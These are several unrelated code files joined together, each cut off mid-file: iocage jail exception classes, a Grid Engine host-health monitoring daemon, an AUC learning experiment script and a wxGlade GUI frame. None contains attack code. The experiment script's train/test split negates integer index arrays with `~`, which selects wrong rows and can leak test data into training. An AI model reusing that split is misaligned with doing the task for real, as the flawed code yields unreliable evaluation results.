JailException.__init__(self, message=msg, jail=jail, logger=logger)
class JailHookFailed(JailException):
"""Raised when the jail could not be launched."""
def __init__(
self,
jail: 'libioc.Jail.JailGenerator',
hook: str,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
self.hook = hook
msg = f"Jail {jail.full_name} hook {hook} failed"
JailException.__init__(self, message=msg, jail=jail, logger=logger)
class JailLaunchFailed(JailException):
"""Raised when the jail could not be launched."""
def __init__(
self,
jail: 'libioc.Jail.JailGenerator',
reason: typing.Optional[str]=None,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"Launching jail {jail.full_name} failed"
if reason is not None:
msg += f": {reason}"
JailException.__init__(self, message=msg, jail=jail, logger=logger)
class JailDestructionFailed(JailException):
"""Raised when the jail could not be destroyed."""
jail: 'libioc.Jail.JailGenerator'
def __init__(
self,
jail: 'libioc.Jail.JailGenerator',
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"Destroying jail {jail.full_name} failed"
JailException.__init__(self, message=msg, jail=jail, logger=logger)
class JailCommandFailed(IocException):
"""Raised when a jail command fails with an exit code > 0."""
returncode: int
def __init__(
self,
returncode: int,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
self.returncode = returncode
msg = f"Jail command exited with {returncode}"
IocException.__init__(self, message=msg, logger=logger)
class JailExecutionAborted(JailException):
"""Raised when a jail command fails with an exit code > 0."""
def __init__(
self,
jail: 'libioc.Jail.JailGenerator',
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"Jail execution of {jail.humanreadable_name} aborted"
JailException.__init__(self, message=msg, jail=jail, logger=logger)
# Jail State
class JailStateUpdateFailed(IocException):
"""Raised when a JLS query failed."""
def __init__(
self,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = "JLS query failed"
IocException.__init__(self, message=msg, logger=logger)
# Jail Fstab
class VirtualFstabLineHasNoRealIndex(IocException):
"""Raised when attempting to access the index of a virtual fstab line."""
def __init__(
self,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = "The virtual fstab line does not have a real list index"
IocException.__init__(self, message=msg, logger=logger)
class FstabDestinationExists(IocException):
"""Raised when the destination directory does not exist."""
def __init__(
self,
mountpoint: str,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"The mountpoint {mountpoint} already exists in the fstab file"
IocException.__init__(self, message=msg, logger=logger)
# Security
class SecurityViolation(IocException):
"""Raised when iocage has security concerns."""
def __init__(
self,
reason: str,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"Security violation: {reason}"
IocException.__init__(self, message=msg, logger=logger)
class InsecureJailPath(SecurityViolation):
"""Raised when a a path points outside of a resource."""
def __init__(
self,
path: str,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"Insecure path {path} jail escape attempt"
SecurityViolation.__init__(self, reason=msg)
class SecurityViolationConfigJailEscape(SecurityViolation):
"""Raised when a file symlinks to a location outside of the jail."""
def __init__(
self,
file: str,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"The file {file} references a file outsite of the jail resource"
SecurityViolation.__init__(self, reason=msg)
class IllegalArchiveContent(IocException):
"""Raised when a release asset archive contains malicious content."""
def __init__(
self,
asset_name: str,
reason: str,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"Asset {asset_name} contains illegal files - {reason}"
super().__init__(message=msg, logger=logger)
# JailConfig
class JailConfigError(IocException):
"""Raised when a general configuration error occurs."""
pass
class InvalidJailName(JailConfigError):
"""Raised when a jail has an invalid name."""
def __init__(
self,
name: str,
invalid_characters: typing.Optional[typing.List[str]]=None,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = (
f"Invalid jail name '{name}': "
"Names may not begin or end with special characters, "
"but may contain alphanumeric and allowed special characters "
"! ^ - _ ( ) [ ] { } < > , ."
)
if invalid_characters is not None:
msg += ", but got " + str("".join(invalid_characters) + "")
super().__init__(message=msg, logger=logger)
class JailConigZFSIsNotAllowed(JailConfigError):
"""Raised when a jail is not allowed to use ZFS shares."""
def __init__(
self,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = (
"jail_zfs is disabled "
"despite jail_zfs_dataset is configured"
)
super().__init__(message=msg, logger=logger)
class InvalidJailConfigValue(JailConfigError, ValueError):
"""Raised when a jail configuration value is invalid."""
def __init__(
self,
property_name: str,
jail: typing.Optional['libioc.Jail.JailGenerator']=None,
reason: typing.Optional[str]=None,
logger: typing.Optional['libioc.Logger.Logger']=None,
level: str="error"
) -> None:
msg = f"Invalid value for property '{property_name}'"
if jail is not None:
msg += f" of jail {jail.humanreadable_name}"
if reason is not None:
msg += f": {reason}"
super().__init__(message=msg, logger=logger, level=level)
class InvalidJailConfigAddress(InvalidJailConfigValue):
"""Raised when a jail address is invalid."""
def __init__(
self,
value: str,
property_name: str,
jail: typing.Optional['libioc.Jail.JailGenerator']=None,
logger: typing.Optional['libioc.Logger.Logger']=None,
level: str="error"
) -> None:
reason = f"expected \"<nic>|<address>\" but got \"{value}\""
super().__init__(
property_name=property_name,
jail=jail,
reason=reason,
level=level,
logger=logger
)
class InvalidMacAddress(IocException, ValueError):
"""Raised when a jail MAC address is invalid."""
def __init__(
self,
mac_address: str,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
reason = f"invalid mac address: \"{mac_address}\""
IocException.__init__(
self,
message=reason
)
class ResourceLimitUnknown(IocException, KeyError):
"""Raised when a resource limit has | |
<reponame>nirmalya-broad/PatHCap_PL
#!/usr/bin/env python
# The Broad Institute
# SOFTWARE COPYRIGHT NOTICE AGREEMENT
# This software and its documentation are copyright 2016 by the
# Broad Institute/Massachusetts Institute of Technology. All rights are
# reserved.
# This software is supplied without any warranty or guaranteed support
# whatsoever. Neither the Broad Institute nor MIT can be responsible for its
# use, misuse, or functionality.
"""
Daemon program that examines Grid Engine jobs in order to determine if any hosts are unhealthy.
A list of jobs for all users (by default) is captured, and the following conditions are reported:
- Host for a running job does not respond to ping
- Host for a running job has a queue in unreachable stage
- Job has been in transfer state too long
- Job has been in deletion stage too long
- Job is using more CPU than it has requested
- Job does appears to be cpu-starved; i.e. cpu-time/run-time is small
Note that jobs can appear cpu-starved for legitimate reasons. Therefore a host must have multiple cpu-starved jobs
to be reported, and if a job array has cpu-starved jobs on multiple hosts, it is not considered to be a problem.
See the options below to control the thresholds for these conditions.
Note that files containing lists of users, hosts, jobs are re-read every time status is checked, so these files
can be changed without having to restart the daemon.
Note that files containing lists may have blank lines, and comments introduced with # and continuing to EOL.
"""
import argparse
import collections
import itertools
import logging
import signal
import subprocess
import sys
import time
import traceback
import email_notify
import uge_functions
def read_list_file(path):
"""
Parse a file containing one element per line, optionally with line comments starting with '#'
:param path: file to be read
:return: list of elements, with comments and newlines removed
"""
with open(path, "r") as fIn:
ret = [line.rstrip("\n").split("#", 1)[0].strip() for line in fIn.readlines()]
return [line for line in ret if len(line) > 0]
def combine_option_lists(list1, list2, default_list=None):
if default_list is None:
default_list = []
if list1 is None:
if list2 is None:
if default_list is None:
return []
else:
return default_list
else:
return list2
elif list2 is None:
return list1
else:
return list1 + list2
if sys.platform == "darwin":
wait_flag = "W"
else:
wait_flag = "w"
dev_null = open("/dev/null", "w")
def ping(host):
"""
:arg host: host to be pinged
:return: True if host responded to ping
"""
# Send 1 packet and wait up to 3 seconds for a response.
return subprocess.call(["ping", "-c", "1", "-" + wait_flag, "3", host],
stdout=dev_null, stderr=subprocess.STDOUT) == 0
def ping_hosts(hosts_to_ping, dct_no_ping_hosts):
"""
:param hosts_to_ping: set of hosts to be pinged
:param dct_no_ping_hosts: key: host; value: first time host failed ping. Updated as appropriate
:return: list of hosts that newly failed ping
"""
ret = []
for host in hosts_to_ping:
if ping(host):
if host in dct_no_ping_hosts:
del dct_no_ping_hosts[host]
elif host not in dct_no_ping_hosts:
ret.append(host)
dct_no_ping_hosts[host] = time.time()
return ret
def check_host_queue_state(hosts, dct_bad_state_hosts):
"""
Query queues on given hosts
:param hosts: set of hosts to be queried
:param dct_bad_state_hosts: key: host, value: first time host had bad state. Updated as appropriate
:return: list of hosts that newly have bad state
"""
ret = []
current_bad_state_hosts = uge_functions.get_hosts_with_unreachable_queues(hosts)
for host in hosts:
if host in current_bad_state_hosts:
if host not in dct_bad_state_hosts:
ret.append(host)
dct_bad_state_hosts[host] = time.time()
elif host in dct_bad_state_hosts:
# problem has cleared
del dct_bad_state_hosts[host]
return ret
def is_transfer_state(state):
return state.find("t") != -1
def is_delete_state(state):
return state.find("d") != -1
def is_running_state(state):
return state == "r"
ProblemState = collections.namedtuple("ProblemState", ["host", "state", "first_seen_time", "reported_time", "user",
"start_time"])
def update_strange_jobs(dct_strange_state_jobs, job, state, job_details=None):
prev_problem_state = dct_strange_state_jobs.get(job.job_and_task)
if prev_problem_state is None or prev_problem_state.state != state:
# if state has changed, treat this as the old problem being cleared
if job_details is not None:
start_time_secs = job_details.start_time_secs
else:
start_time_secs = None
dct_strange_state_jobs[job.job_and_task] = \
ProblemState(job.host, state, time.time(), None, job.user, start_time_secs)
def cpu_starved(job_detail, wallclock_threshold_minutes, cpu_fraction):
if job_detail.start_time_secs is None:
return None
wallclock_secs = time.time() - job_detail.start_time_secs
if wallclock_secs < wallclock_threshold_minutes * 60:
# job has not been running long enough
return None
elif job_detail.cpu_secs is None:
logging.log_message("Could not get cpu time for ", job_detail.job_and_task)
return 0
else:
fraction = job_detail.cpu_secs / float(wallclock_secs)
if fraction <= cpu_fraction:
return fraction
else:
return None
def cpu_hog(job_detail, hog_threshold):
if job_detail.start_time_secs is None:
return None
wallclock_secs = time.time() - job_detail.start_time_secs
if job_detail.cpu_secs is None:
logging.log_message("Could not get cpu time for ", job_detail.job_and_task)
return 0
elif job_detail.slots is None:
logging.log_message("Could not get slots for ", job_detail)
else:
hog_amount = (job_detail.cpu_secs / float(wallclock_secs)) - job_detail.slots
if hog_amount >= hog_threshold:
return hog_amount
else:
return None
def remove_strange_job(dct_strange_state_jobs, strange_job):
if strange_job in dct_strange_state_jobs:
del dct_strange_state_jobs[strange_job]
def count_starved_jobs_by_host(dct_strange_state_jobs,
job_per_host_verbosity_threshold=None,
host_per_job_verbosity_threshold=None):
# Count the unique jobs on a host that are cpu-starved.
# Multiple tasks for the same job on the same host count as 1.
# The idea is that a job could look cpu-starved if it is waiting for something, e.g. downloading something
# over the network. If a host is in trouble, there should be multiple jobs that appear cpu-starved.
# Also, count the number of hosts on which one of the tasks for a job is cpu-starved. If there are several,
# it is probably the job and not a host in trouble.
# returns tuple(dict(host=>count of unique starved jobs), dict(job_id=>count of unique hosts on which a task for that job is starved)
dct_host_starved_jobs = {} # key: host; value: set of job IDs (not job_and_task)
dct_starved_job_hosts = {} # key: job ID, value: set of hosts on which that job has a starved task
for job_and_task, problem_state in dct_strange_state_jobs.items():
if problem_state.state.startswith("cpu-starved"):
dct_host_starved_jobs.setdefault(problem_state.host, set()).add(job_and_task.job_id)
dct_starved_job_hosts.setdefault(job_and_task.job_id, set()).add(problem_state.host)
if job_per_host_verbosity_threshold is not None:
for host, jobs in dct_host_starved_jobs.iteritems():
if len(jobs) >= job_per_host_verbosity_threshold:
logging.log_message(host + " has cpu-starved jobs " + ", ".join(jobs))
if host_per_job_verbosity_threshold is not None:
for job, hosts in dct_starved_job_hosts.iteritems():
if len(hosts) >= host_per_job_verbosity_threshold:
logging.log_message(job + " is cpu-starved on hosts " + ", ".join(hosts))
return (dict([(host, len(jobs)) for host, jobs in dct_host_starved_jobs.items()]),
dict([(job_id, len(hosts)) for job_id, hosts in dct_starved_job_hosts.items()]))
def format_job_problem(job_and_task, problem_state):
if problem_state.start_time is not None:
start_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(problem_state.start_time))
else:
start_time = "start time not captured"
return "%s\t%s\t%s.%s:\t%s" % \
(start_time, problem_state.user, job_and_task.job_id, job_and_task.task_id, problem_state.state)
def format_problems(dct_problems):
message = ""
for host, problems in dct_problems.iteritems():
message += "%s:\n\t%s\n" % (host, "\n\t".join(problems))
return message
def sigint_handler(signum, frame):
"""Log termination cleanly"""
logging.log_message("Exiting after received signal %d\n%s" %
(signum, "".join(traceback.format_list(traceback.extract_stack(frame)))))
sys.exit()
def main(args=None):
parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("--email", "-e", action="append",
help="email address(es) to which report should be sent. Default: write report to stdout")
parser.add_argument("--user", "-u", action="append",
help="User(s) whose jobs should be checked. Default: all users")
parser.add_argument("--user-file", type=read_list_file,
help="File containing list of users whose jobs should be checked, one per line.")
parser.add_argument("--exclude-user", action="append",
help="User(s) whose jobs should not be checked.")
parser.add_argument("--exclude-user-file", type=read_list_file,
help="File containing list of users whose jobs should not be checked, one per line.")
parser.add_argument("--ignore-job", "-j", action="append",
help="Job ID(s) that should be ignored")
parser.add_argument("--ignore-job-file", type=read_list_file,
help="File containing list of job ID(s) that should be ignored, one per line")
parser.add_argument("--ignore-host", action="append",
help="Host(s) that should be ignored")
parser.add_argument("--ignore-host-file", type=read_list_file,
help="File containing list of host(s) that should be ignored, one per line")
parser.add_argument("--sleep-mins", "-s", type=float, default=60,
help="Time (in minutes) to sleep between status checks. Default: %(default)s")
parser.add_argument("--heartbeat-mins", type=float, default=24 * 60,
help="Time (in minutes) to sleep between sending message even if no problems. "
"Default: %(default)s")
parser.add_argument("--delete-mins", "-d", type=float, default=30,
help="A job in deletion state for more than this time (in minutes) is treated as a problem. "
"Default: %(default)s")
parser.add_argument("--transfer-mins", "-t", type=float, default=30,
help="A job in transfer state for more than this time (in minutes) is treated as a problem. "
"Default: %(default)s")
parser.add_argument("--cpu_fraction", "-c", type=float, default=0.0001,
help="A job with cpu time/wallclock time < this value is considered cpu-starved. "
"Default: %(default)s")
parser.add_argument("--starved-jobs-per-host", type=int, default=2,
help="A cpu-starved job is not reported unless there are at least this many cpu-starved jobs"
" on the host. Multiple task for the same job are counted as one. Default: %(default)s")
parser.add_argument("--starved-task-array-hosts", type=int, default=4,
help="If a task array has cpu-starved jobs on at least this many hosts, it is assumed | |
<filename>learning-experiment/make_exps.py<gh_stars>0
"""
Code for:
Trade-offs in Large Scale Distributed Tuplewise Estimation and Learning
Author: <NAME>
"""
import os
import shutil
import json
import logging
import pickle
from scipy.io import loadmat
import numpy as np
# Avoid trouble when generating pdf's on a distant server:
# import matplotlib
# matplotlib.use("pdf")
import matplotlib.pyplot as plt
from matplotlib.ticker import NullFormatter
import compute_stats as cs
SEED_SHUFFLE = 42
# Bounds for the axis in the plots
LB_CONV_COST = 0.01
LB_AUC = 0.005
UB_CONV_COST = 0.1
UB_AUC = 0.02
QUANTILE_PLOT_FILTER = 750
# Limit on the number of iterations represented by the plot
TYPE_TRAIN_MONITOR = "FIXED_PAIRS" # "SAME_AS_BATCH"
# FIXED_PAIRS: monitors the training loss on a fixed set of instances.
# SAME_AS_BATCH: monitors the training loss on training batches.
# Parameters of the monitoring pairs if fixed pairs.
SEED_TRAIN_MONITOR = 54
SIZE_TRAIN_MONITOR = 450000
# Others
PROP_TEST = 0.2
DEFAULT_ITE_NUMBER = 5000 # 5000
# ------------------------ Fundations functions -------------------------
def convert_data_to_pickle():
"""Loads the data from mat format and exports it to the pickle format."""
data = loadmat("shuttle.mat")
data["y"] = 2*data["y"].ravel().astype(int) - 1
pickle.dump(data, open("shuttle.pickle", "wb"))
def load_preprocess_data():
"""Loads and preprocess the data."""
data = pickle.load(open("shuttle.pickle", "rb"))
X = data["X"]
y = data["y"]
Z_tot = X[y == +1] # Minority class is the anomaly class, i.e. y = +1
X_tot = X[y == -1]
np.random.seed(SEED_SHUFFLE)
ind_X_test = np.random.choice(X_tot.shape[0],
size=int(PROP_TEST*X_tot.shape[0]),
replace=False)
ind_Z_test = np.random.choice(Z_tot.shape[0],
size=int(PROP_TEST*Z_tot.shape[0]),
replace=False)
np.random.seed()
Z_train, X_train = Z_tot[~ind_Z_test], X_tot[~ind_X_test]
Z_test, X_test = Z_tot[ind_Z_test], X_tot[ind_X_test]
train_tot = np.vstack([X_train, Z_train])
# Normalize the instances
train_mean = train_tot.mean(axis=0)
train_std = train_tot.std(axis=0)
if np.min(train_std) == 0:
raise ValueError("One of the columns in the data has constant var.")
X_train = (X_train - train_mean)/train_std
Z_train = (Z_train - train_mean)/train_std
X_test = (X_test - train_mean)/train_std
Z_test = (Z_test - train_mean)/train_std
# Add a constant
def add_constant(a):
return np.hstack([a, np.ones((a.shape[0], 1))])
X_train = add_constant(X_train)
Z_train = add_constant(Z_train)
X_test = add_constant(X_test)
Z_test = add_constant(Z_test)
return Z_train, X_train, Z_test, X_test
def learning_process(X, Z, p_learn, optim_type="momentum"):
"""Learning process for our experiments."""
n_X, n_Z = X.shape[0], Z.shape[0]
N = p_learn["N"]
B = p_learn["B"]
learning_rate = p_learn["learning_rate"]
margin = p_learn["margin"]
w = p_learn["w_init"]
to_log = ["{} : {}".format(k, v) for k, v in p_learn.items()
if not k.startswith(("train_", "test_", "w"))]
i = 0
while i < len(to_log)/4:
logging.info("%s", " / ".join(to_log[(i*4):(i*4+4)]))
i += 1
logging.info("#X: %d / #Z: %d ", n_X, n_Z)
logging.info("#X/N: %d / #Z/N: %d ", n_X/N, n_Z/N)
logging.info("pairs_per_clust: %d ", (n_X/N)*(n_Z/N))
logging.info("#eval_pairs_before_reshuffle: %d ",
B*p_learn["reshuffle_mod"])
X_s, Z_s = cs.SWR_divide(X, Z, N)
delta_w = 0
for i in range(0, p_learn["n_it"]):
if i % p_learn["reshuffle_mod"] == 0:
# logging.info("it %5d: reshuffling", i)
X_s, Z_s = cs.SWR_divide(X, Z, N)
if i % p_learn["eval_mod"] == 0:
evaluation_step(i, X_s, Z_s, w, p_learn)
gradient = (cs.UN_split(X_s, Z_s, cs.grad_inc_block(w, B, margin))
+ p_learn["reg"]*w)
assert optim_type in ["SGD", "momentum"]
if optim_type == "SGD":
delta_w = learning_rate*gradient
if optim_type == "momentum":
momentum = 0.9
delta_w = momentum*delta_w + learning_rate*gradient
w = w - delta_w
def evaluation_step(i, X_s, Z_s, w, p_learn):
"""
Modify the value of p_learn to add to the evaluation.
Monitored values, added in p_learn:
* br_AUC: block real AUC, on the training data,
* bc_AUC: block convexified AUC, on the training data,
* tr_AUC: real AUC, on the testing data,
* tc_AUC: convexified AUC, on the testing data,
"""
margin = p_learn["margin"]
logging.debug("Step %d: Begin evaluation", i)
if TYPE_TRAIN_MONITOR == "SAME_AS_BATCH":
sc_X = [x.dot(w) for x in X_s]
sc_Z = [z.dot(w) for z in Z_s]
bc_AUC = (cs.UN_split(sc_X, sc_Z, cs.conv_AUC(margin))
+ p_learn["reg"]*(np.linalg.norm(w)**2)/2)
br_AUC = cs.UN_split(sc_X, sc_Z,
lambda x, z: cs.Un(x, z, kernel="AUC"))
elif TYPE_TRAIN_MONITOR == "FIXED_PAIRS":
sc_X, sc_Z = p_learn["train_X"].dot(w), p_learn["train_Z"].dot(w)
bc_AUC = (cs.conv_AUC_deter_pairs(margin)(
sc_X, sc_Z, p_learn["train_mon_pairs"])
+ p_learn["reg"]*(np.linalg.norm(w)**2)/2)
br_AUC = cs.UB_pairs(
sc_X, sc_Z, p_learn["train_mon_pairs"], kernel="AUC")
sc_X_test = p_learn["test_X"].dot(w)
sc_Z_test = p_learn["test_Z"].dot(w)
tc_AUC = (cs.conv_AUC(margin)(sc_X_test, sc_Z_test)
+ p_learn["reg"]*(np.linalg.norm(w)**2)/2)
tr_AUC = cs.Un(sc_X_test, sc_Z_test, kernel="AUC")
s_log = ("it %5d: bc_AUC = %.4f | br_AUC = %.4f "
+ "| tc_AUC = %5.4f | tr_AUC = %5.4f")
logging.info(s_log, i, bc_AUC, br_AUC, tc_AUC, tr_AUC)
# Elements to add to the dictionary:
elems = [("iter", i), ("norm_w", np.linalg.norm(w)),
("bc_AUC", bc_AUC), ("br_AUC", br_AUC),
("tr_AUC", tr_AUC), ("tc_AUC", tc_AUC)]
for k, v in elems:
if k in p_learn:
p_learn[k].append(v)
else:
p_learn[k] = [v]
logging.debug("Step %d: End evaluation", i)
def make_exps(reshuffle_mod, out_folder="exps/test", p_learn=None):
"""Make the experiments for the desired parameters."""
if not os.path.exists(out_folder):
os.makedirs(out_folder)
shutil.copy(os.path.basename(__file__),
"{}/executed_script.py".format(out_folder))
Z_train, X_train, Z_test, X_test = load_preprocess_data()
n_feats = Z_train.shape[1]
# Set parameters:
logging.basicConfig(filename='{}/learning_process.log'.format(out_folder),
format='%(asctime)s - %(message)s',
# - %(levelname)s
level=logging.INFO, datefmt='%m/%d/%y %I:%M:%S %p',
filemode="w")
if p_learn is None:
p_learn = {"n_it": DEFAULT_ITE_NUMBER, "margin": 1, "N": 100,
"B": 100, "reshuffle_mod": reshuffle_mod, "reg": 0.05,
"learning_rate": 0.01, "eval_mod": 25,
"w_init": np.random.normal(0, 1, (n_feats, 1)),
"test_X": X_test, "test_Z": Z_test}
if TYPE_TRAIN_MONITOR == "FIXED_PAIRS":
np.random.seed(SEED_TRAIN_MONITOR)
p_learn["train_mon_pairs"] = zip(list(
np.random.randint(0, X_train.shape[0], SIZE_TRAIN_MONITOR)), list(
np.random.randint(0, Z_train.shape[0], SIZE_TRAIN_MONITOR)))
p_learn["train_mon_pairs"] = list(p_learn["train_mon_pairs"])
p_learn["train_X"] = X_train
p_learn["train_Z"] = Z_train
np.random.seed()
print("Started optimization")
learning_process(X_train, Z_train, p_learn)
print("Finished optimization")
# We get rid of the testing numpy arrays, as well as the init.
keys_to_delete = list(filter(
lambda x: x.startswith(("train_", "test_", "w_")), p_learn.keys()))
for x in keys_to_delete:
p_learn.pop(x)
json.dump(p_learn, open("{}/dynamics.json".format(out_folder), "wt"))
# Convert to array to make everything plottable.
for k in p_learn:
if k.endswith("AUC"):
p_learn[k] = np.array(p_learn[k])
plot_results(p_learn, out_folder)
def plot_results(p_learn, out_folder):
"""Plots the results."""
# n_it = p_learn["n_it"]
# N = p_learn["N"]
# B = p_learn["B"]
# learning_rate = p_learn["learning_rate"]
# w_init = p_learn["w_init"]
# margin = p_learn["margin"]
reshuffle_mod = p_learn["reshuffle_mod"]
# eval_mod = p_learn["eval_mod"]
# Plot the result
plt.figure()
plt.plot(p_learn["iter"], p_learn["tc_AUC"],
label="test convAUC", color="red")
plt.plot(p_learn["iter"], p_learn["bc_AUC"],
label="train convAUC", color="red", linestyle="--")
plt.grid()
plt.legend(loc="lower left")
plt.ylabel("Convex cost", color="red")
plt.ylim([LB_CONV_COST, UB_CONV_COST])
plt.twinx()
plt.plot(p_learn["iter"], 1 - p_learn["tr_AUC"],
label="test 1-AUC", color="blue")
plt.plot(p_learn["iter"], 1 - p_learn["br_AUC"],
label="train 1-AUC", color="blue", linestyle="--")
plt.ylabel("1-AUC", color="blue")
plt.ylim([LB_AUC, UB_AUC])
plt.legend(loc="upper right")
plt.title("n_r = {}".format(reshuffle_mod))
plt.tight_layout()
plt.savefig("{}/dynamics.pdf".format(out_folder), format="pdf")
plt.close()
def load_all_results_and_plot(out_folder_list, type_plot="average"):
"""Loads the results for lots of runs and plots them."""
res_dict = dict()
for out_folder in out_folder_list:
p_learn = json.load(open("{}/dynamics.json".format(out_folder), "rt"))
# Convert to array to make everything plottable.
for k in p_learn:
if k.endswith("AUC"):
p_learn[k] = np.array(p_learn[k])
if k in res_dict:
res_dict[k].append(p_learn[k])
else:
res_dict[k] = [p_learn[k]]
assert type_plot in ["average", "quantile"]
out_folder_plot = "/".join(out_folder_list[0].split("/")[:-1])
if type_plot == "average":
for k in res_dict:
res_dict[k] = np.mean(res_dict[k], axis=0)
p_learn["reshuffle_mod"] = np.mean(p_learn["reshuffle_mod"])
plot_results(p_learn, out_folder_plot)
elif type_plot == "quantile":
plot_quantiles(res_dict, out_folder_plot, type_plot)
def load_results_and_plot(out_folder):
"""Loads the results and plots them."""
p_learn = json.load(open("{}/dynamics.json".format(out_folder), "rt"))
# Convert to array to make everything plottable.
for k in p_learn:
if k.endswith("AUC"):
p_learn[k] = np.array(p_learn[k])
plot_results(p_learn, out_folder)
def plot_quantiles(p_learn, out_folder, out_name, pos=1, saveit=True):
"""Plots the results."""
reshuffle_mod = p_learn["reshuffle_mod"]
# The entries of the dictionary contain a matrix n_runs, n_values.
alphas = [0.05]
def quantile(X, q, axis=0):
"""np.quantile only exists on numpy 1.15 and higher."""
assert axis == 0
X = np.array(X)
return np.sort(X, axis=0)[int(X.shape[0]*q), :]
filt = np.array(p_learn["iter"][0]) <= QUANTILE_PLOT_FILTER
def filt_elem(a):
return np.array(a)[filt]
# Beginning of plotting operations:
if saveit:
plt.figure(figsize=(3, 4))
for alpha in alphas:
plt.fill_between(
filt_elem(p_learn["iter"][0]),
filt_elem(quantile(p_learn["tc_AUC"], (1-alpha/2), axis=0)),
filt_elem(quantile(p_learn["tc_AUC"], alpha/2, axis=0)),
color="red", label="95% CI", alpha=0.25)
plt.plot(filt_elem(p_learn["iter"][0]),
filt_elem(np.median(p_learn["tc_AUC"], axis=0)),
label="test", color="red")
plt.plot(filt_elem(p_learn["iter"][0]),
filt_elem(np.median(p_learn["bc_AUC"], axis=0)),
label="train", color="red", linestyle="--")
plt.grid()
if not saveit:
if pos%2 == 0: # Checks whether we need a label for y axis.
# plt.gca().set_yticks([])
plt.gca().yaxis.set_major_formatter(NullFormatter())
else:
plt.ylabel("Loss", color="red")
plt.ticklabel_format(style='sci', axis="y", scilimits=(0, 0))
if pos <= 2: # Checks whether we need a label for x axis.
# plt.gca().set_xticks([])
plt.gca().xaxis.set_major_formatter(NullFormatter())
if pos > 2:
plt.xlabel("iter")
plt.ylim([LB_CONV_COST, UB_CONV_COST])
plt.twinx()
for alpha in alphas:
plt.fill_between(filt_elem(p_learn["iter"][0]),
filt_elem(quantile(1 - np.array(p_learn["tr_AUC"]),
(1-alpha/2), axis=0)),
filt_elem(quantile(1 - np.array(p_learn["tr_AUC"]),
alpha/2, axis=0)),
color="blue", label="95% CI", alpha=0.25)
plt.plot(filt_elem(p_learn["iter"][0]),
(1 - filt_elem(np.median(p_learn["tr_AUC"], axis=0))),
label="test", color="blue")
plt.plot(filt_elem(p_learn["iter"][0]),
(1 - filt_elem(np.median(p_learn["br_AUC"], axis=0))),
label="train", color="blue", linestyle="--")
if not saveit:
if pos%2 == 0: # Checks whether we need a label for y axis.
plt.ylabel("1-AUC", color="blue")
plt.ticklabel_format(style='sci', axis="y", scilimits=(0, 0))
else:
# plt.gca().set_yticks([])
plt.gca().yaxis.set_major_formatter(NullFormatter())
plt.ylim([LB_AUC, UB_AUC])
if saveit:
plt.legend(loc="upper right")
if int(np.mean(reshuffle_mod)) == 10000:
plt.title("$n_r = 10,000$")
else:
plt.title("$n_r = {}$".format(int(np.mean(reshuffle_mod))))
plt.tight_layout()
if saveit:
plt.savefig("{}/{}.pdf".format(out_folder, out_name), format="pdf")
plt.close()
def get_final_graph_legend(fig):
"""Builds the legend of figure 4 of the publication."""
plt.style.use('default')
plt.rc('text', usetex=True)
plt.rc('font', family='serif') # sans-
plt.rcParams.update({'font.size': 16,
'font.serif' : ['Computer Modern Roman']})
legend_elements = list()
# Filler if the elements are ill-disposed:
# matplotlib.patches.Rectangle((0,0), 1, 1, fill=False,
# edgecolor='none', visible=False)
legend_elements.append(plt.fill_between([0], [0], [0], | |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
# generated by wxGlade 0.6.8 on Fri Sep 2 19:08:14 2016
#
import wx
# begin wxGlade: dependencies
import gettext
# end wxGlade
# begin wxGlade: extracode
# end wxGlade
class MyFrame(wx.Frame):
def __init__(self, *args, **kwds):
# begin wxGlade: MyFrame.__init__
kwds["style"] = wx.DEFAULT_FRAME_STYLE
wx.Frame.__init__(self, *args, **kwds)
self.notebook_1 = wx.Notebook(self, wx.ID_ANY, style=0)
self.tab_simulation = wx.Panel(self.notebook_1, wx.ID_ANY)
self.panel_rosbag_play = wx.Panel(self.tab_simulation, wx.ID_ANY)
self.sizer_79_staticbox = wx.StaticBox(self.tab_simulation, wx.ID_ANY, "")
self.button_play_rosbag_play = wx.ToggleButton(self.tab_simulation, wx.ID_ANY, _("Play"))
self.button_stop_rosbag_play = wx.ToggleButton(self.tab_simulation, wx.ID_ANY, _("Stop"))
self.button_pause_rosbag_play = wx.ToggleButton(self.tab_simulation, wx.ID_ANY, _("Pause"))
self.label_rosbag_play_bar = wx.StaticText(self.tab_simulation, wx.ID_ANY, _("Playing ... 82 %"))
self.label_rosbag_play_pos = wx.StaticText(self.tab_simulation, wx.ID_ANY, "")
self.static_line_3 = wx.StaticLine(self.tab_simulation, wx.ID_ANY)
self.label_rosbag_play_total = wx.StaticText(self.tab_simulation, wx.ID_ANY, "")
self.panel_5 = wx.ScrolledWindow(self.tab_simulation, wx.ID_ANY, style=wx.TAB_TRAVERSAL)
self.label_rosbag_info = wx.StaticText(self.panel_5, wx.ID_ANY, "")
self.button_rosbag_simulation = wx.ToggleButton(self.tab_simulation, wx.ID_ANY, _("ROSBAG"))
self.button_rviz_simulation = wx.ToggleButton(self.tab_simulation, wx.ID_ANY, _("RViz"))
self.button_rqt_simulation = wx.ToggleButton(self.tab_simulation, wx.ID_ANY, _("RQT"))
self.bitmap_logo = wx.StaticBitmap(self, wx.ID_ANY, wx.NullBitmap)
self.__set_properties()
self.__do_layout()
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnROSbagPlay, self.button_play_rosbag_play)
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnROSbagPlay, self.button_stop_rosbag_play)
